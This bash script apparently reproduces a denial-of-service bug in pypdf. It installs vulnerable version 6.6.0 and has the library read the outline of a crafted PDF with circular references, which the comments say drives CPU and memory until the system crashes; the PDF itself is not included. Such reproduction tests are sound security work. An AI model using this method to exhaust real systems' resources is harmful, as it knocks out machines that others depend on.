#!/bin/bash
#
# pypdf - UNSAFE Vulnerability Test
# This will cause CPU to spike to 100% and memory to grow indefinitely
# WARNING: Will consume all RAM and may crash system
#
# CVE: CVE-2026-24688
# Library: pypdf
# Impact: CPU 100% + Memory exhaustion (~30GB in 5 min) + System crash
#

set -e

# Get the directory where this script is located
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
cd "$SCRIPT_DIR"

echo "========================================="
echo "pypdf - UNSAFE VULNERABILITY TEST"
echo "========================================="
echo ""
echo "⚠️  WARNING: This may crash your system!"
echo "    - CPU: 100%"
echo "    - Memory: Will fill all memory and swap"
echo "    - System: Crashes entirely (eventually)"
echo ""
echo "Press Ctrl+C within 5 seconds to cancel..."
sleep 5

echo ""
echo "Installing pypdf (vulnerable version 6.6.0)..."
pip install "pypdf==6.6.0" --break-system-packages 2>/dev/null || pip install "pypdf==6.6.0"

echo ""
echo "Starting pypdf vulnerability test..."
echo "Monitor: htop (CPU and memory)"
echo ""

# This will hang forever and consume resources
python3 << 'EOF'
from pypdf import PdfReader

pdf_path = "./malicious_circular_outline.pdf"
print(f"📄 Opening: {pdf_path}")
reader = PdfReader(pdf_path)

print("🔄 Attempting to read outline (this will hang/crash)...")
outline = reader.outline
print("This will never print")
EOF

echo "If you see this, the vulnerability was fixed."
